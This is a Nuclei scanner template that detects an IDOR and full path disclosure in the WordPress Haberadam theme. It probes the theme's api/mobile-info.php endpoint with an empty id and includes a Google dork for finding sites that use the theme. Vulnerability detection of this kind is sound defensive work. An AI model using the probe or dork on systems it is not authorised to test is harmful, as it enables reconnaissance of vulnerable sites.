nuclei-templates/vulnerabilities/wordpress/wp-haberadam-idor.yaml

38 lines
894 B
YAML

id: wp-haberadam-idor
info:
name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API
author: pussycat0x
severity: low
reference: https://cxsecurity.com/issue/WLB-2021090078
metadata:
google-dork: inurl:/wp-content/themes/haberadam/
tags: wordpress,idor,wp-theme
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id='
- '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id='
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"status"'
- '"hava"'
- '"degree"'
- '"icon"'
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- text/html